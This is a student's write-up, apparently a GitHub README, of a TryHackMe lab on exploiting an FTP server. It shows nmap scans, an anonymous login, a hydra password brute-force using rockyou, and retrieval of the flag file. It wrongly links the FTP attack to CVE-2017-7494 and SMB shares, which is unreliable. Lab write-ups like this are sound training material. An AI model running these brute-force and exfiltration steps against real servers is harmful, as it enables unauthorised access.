Coder Social home page Coder Social logo

tryhackme-cda-exploiting-ftp-03's Introduction

Documentation: TryHackMe Exploiting FTP #03

1. Introduction

  • Purpose: Document my experience and share knowledge on the Cyber Defense challenges
  • Scope: Learn the fundamental components of detecting and responding to threats in a corporate environment

2. Setup

  • Environment: Kali Linux via VirtualBox
  • Accounts and Access: Created a TryHackMe account and accessed the room via OpenVPN

3. Challenge Walkthrough

3.1 Room Name: Network Services

  • Objective: Access an FTP server and capture the flag by enumerating information then exploiting its vulnerabilities to exfiltrate sensitive data and gain access to the server and capture the flag

3.2 Enumeration

  • Initial Scanning:

    • Tools and Commands:

      • Port Scanning & ftp server enumeration:
        • nmap -A 10.10.40.220 -v
          • nmap -Pn 10.10.40.220 -v
        • Enter ftp 10.10.40.220 to connect to the ftp server
        • Log in user as anonymous password press enter
        • Enter ls then get PUBLIC_NOTICE.txt to download the file to your local folder
        • Enter cat PUBLIC_NOTICE.txt in cli to open file to read contents

    • Findings:

      • Open port HTTP running on 80/tcp
      • Open port FTP running on 21/tcp
      • There's a file called PUBLIC_NOTICE.txt
      • There's a variant ftp version vsFTPd 3.0.3
      • FTP login as Anonymous is allowed
      • A possible username called, Mike

    • image

    • image

    • image

3.3 Exploitation

  • Vulnerability Identification: CVE-2017-7494

    • Techniques Used: exploiting anonymous SMB share access- a common misconfiguration allowing us to gain information that will lead to a shell.

  • Exploitation Process: - Enter hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt.gz -vV 10.10.185.60 ftp to brute force the password of mike using hydra - Syntax breakdown:

    • image

    • image

      • Now that we have the password, in the CLI ftp 10.10.185.60 and press enter
      • In the name type mike and password type password
      • Now you gain access to the FTP server using Mike's credentials
      • Enter ls -a and exfiltrate data type get ftp.txt

    • image

    • image

      • Type cat ftp.txt to view file content

    • image

4. Analysis and Reflection

  • Challenges Faced: This challenge was fairly easy compared to SMB and Telnet exploitation
  • Learnings: I learned FTP's vulnerabilities like ARP-poisoning and that it sends clear text so it's not secured unlike its more secured alternative protocols like SFTP and FTPS
  • Improvements: Do more hands-on activities like this to have practical skills while gaining theoretical knowledge

5. Conclusion

  • Summary: Successfully learned target credentials and exfiltrated data and captured the flag

6. References

tryhackme-cda-exploiting-ftp-03's People

Contributors

abelmorad avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.